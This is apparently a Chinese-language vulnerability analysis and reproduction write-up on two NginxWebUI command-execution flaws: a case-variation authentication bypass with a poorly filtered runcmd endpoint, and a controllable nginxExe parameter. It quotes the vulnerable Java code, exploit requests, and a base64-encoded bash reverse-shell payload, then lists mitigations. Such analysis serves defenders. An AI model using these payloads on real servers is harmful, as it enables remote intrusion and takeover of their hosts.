NginxWebUI 命令执行漏洞分析与复现<\/h1>

1. 漏洞概述<\/h2>

NginxWebUI 是一款图形化管理 Nginx 配置的工具，提供网页界面来快速配置 Nginx 的各项功能。在多个版本中存在命令执行漏洞：<\/p>

未授权 RCE<\/strong>：3.4.7 及之前版本存在未授权命令执行漏洞<\/li>

后台 RCE<\/strong>：3.5.2 至 4.1.1 版本存在后台命令执行漏洞<\/li> <\/ul>
2. 漏洞环境搭建<\/h2>

下载受影响版本的 NginxWebUI 源码<\/li>
导入到 IDEA 开发环境中<\/li>
直接启动项目即可搭建测试环境<\/li> <\/ol>
3. 漏洞分析<\/h2>
3.1 未授权 RCE 分析（3.4.7 版本）<\/h3>
3.1.1 认证绕过机制<\/h4>

框架特性<\/strong>：使用 Solon 框架（2.2.14 之前版本），默认对 URL 匹配"忽略大小写"<\/li>
过滤器逻辑<\/strong>：

路径包含 \/adminPage\/<\/code> 且不包含 \/lib\/<\/code>、\/doc\/<\/code>、\/js\/<\/code>、\/img\/<\/code> 或 \/css\/<\/code> 时进行权限验证<\/li>
可通过大小写混淆绕过鉴权（如 \/AdminPage\/<\/code>）<\/li> <\/ul> <\/li> <\/ol> 3.1.2 命令执行点分析<\/h4> 漏洞位置<\/strong>：com.cym.controller.adminPage.ConfController#runcmd<\/code><\/p> public<\/span> JsonResult runcmd<\/span>(<\/span>String cmd)<\/span> {<\/span> <\/span><\/span> \/\/ 过滤特殊字符 <\/span><\/span><\/span><\/span> cmd =<\/span> cmd.<\/span>replace<\/span>(<\/span>"&"<\/span>,<\/span> " "<\/span>).<\/span>replace<\/span>(<\/span>"|"<\/span>,<\/span> " "<\/span>).<\/span>replace<\/span>(<\/span>";"<\/span>,<\/span> " "<\/span>).<\/span>replace<\/span>(<\/span>"$"<\/span>,<\/span> " "<\/span>).<\/span>replace<\/span>(<\/span>"`"<\/span>,<\/span> " "<\/span>);<\/span> <\/span><\/span> <\/span><\/span> \/\/ 检查是否包含nginx关键字 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>cmd.<\/span>contains<\/span>(<\/span>"nginx"<\/span>))<\/span> {<\/span> <\/span><\/span> cmd =<\/span> "nginx restart"<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> <\/span><\/span> \/\/ 执行命令 <\/span><\/span><\/span><\/span> RuntimeUtil.<\/span>exec<\/span>(<\/span>cmd);<\/span> <\/span><\/span> return<\/span> renderSuccess();<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>漏洞特点<\/strong>：<\/p> 特殊字符过滤不完全（仅过滤了 &|;$<\/code>）<\/li> 可通过未过滤的字符（如 %26<\/code>）绕过<\/li> 命令拼接后直接执行<\/li> <\/ol> 3.1.3 漏洞验证 Payload<\/h4> \/AdminPage\/conf\/runCmd?cmd=calc%26nginx <\/code><\/pre> 3.2 后台 RCE 分析（3.5.2-4.1.1 版本）<\/h3> 3.2.1 认证绕过修复<\/h4> 升级 Solon 框架至 2.2.14 版本（支持大小写敏感）<\/li> 在过滤器中添加 URI 统一小写转换： String path =<\/span> ctx.<\/span>path<\/span>().<\/span>toLowerCase<\/span>();<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.2.2 新发现的命令执行点<\/h4> 漏洞位置<\/strong>：check<\/code> 方法（nginxExe<\/code> 参数可控）<\/p> @Mapping<\/span>(<\/span>value =<\/span> "check"<\/span>)<\/span> <\/span><\/span>public<\/span> JsonResult check<\/span>(<\/span>String nginxPath,<\/span> String nginxExe,<\/span> String nginxDir,<\/span> String json)<\/span> {<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> cmd =<\/span> nginxExe +<\/span> " -t -c "<\/span> +<\/span> fileTemp;<\/span> <\/span><\/span> if<\/span> (<\/span>StrUtil.<\/span>isNotEmpty<\/span>(<\/span>nginxDir))<\/span> {<\/span> <\/span><\/span> cmd +=<\/span> " -p "<\/span> +<\/span> nginxDir;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> rs =<\/span> RuntimeUtil.<\/span>execForStr<\/span>(<\/span>cmd);<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>执行流程<\/strong>：<\/p> 读取 mime.types<\/code> 资源文件写入临时文件<\/li> 构建测试 Nginx 配置有效性的命令<\/li> 直接执行用户可控的 nginxExe<\/code> 参数<\/li> <\/ol> 3.2.3 命令执行分析<\/h4> RuntimeUtil.execForStr()<\/code> 方法：<\/p> 按空格分割命令为数组<\/li> 检查命令中是否包含空字符<\/li> 使用 ProcessBuilder.start()<\/code> 执行命令<\/li> <\/ol> 限制<\/strong>：<\/p> 命令会被分割执行，直接执行系统命令可能失效<\/li> 需要特殊构造绕过<\/li> <\/ul> 3.2.4 漏洞验证 Payload<\/h4> Windows 系统<\/strong>：<\/p> POST \/adminPage\/conf\/check nginxExe=calc&... <\/code><\/pre> Linux 系统<\/strong>（Base64 编码绕过）：<\/p> bash+-c+{echo,xxxxxxxxxxxxxxOS85OTk5IDA+JjE=}|{base64,-d}|{bash,-i} <\/code><\/pre> 4. 漏洞修复方案<\/h2> 输入验证<\/strong>：<\/p> 对用户输入进行严格过滤<\/li> 使用白名单机制限制可执行命令<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> 加强身份验证机制<\/li> 实现最小权限原则<\/li> <\/ul> <\/li> 安全更新<\/strong>：<\/p> 升级到最新版本（4.1.1 之后版本）<\/li> <\/ul> <\/li> <\/ol> 5. 总结<\/h2> 该漏洞系列展示了 Web 管理界面中常见的两类安全问题：<\/p> 认证绕过导致未授权访问<\/li> 命令注入导致远程代码执行<\/li> <\/ol> 开发人员应当：<\/p> 对所有用户输入进行严格验证<\/li> 使用安全的 API 执行系统命令<\/li> 保持框架和依赖库的最新版本<\/li> 实施最小权限原则<\/li> <\/ul>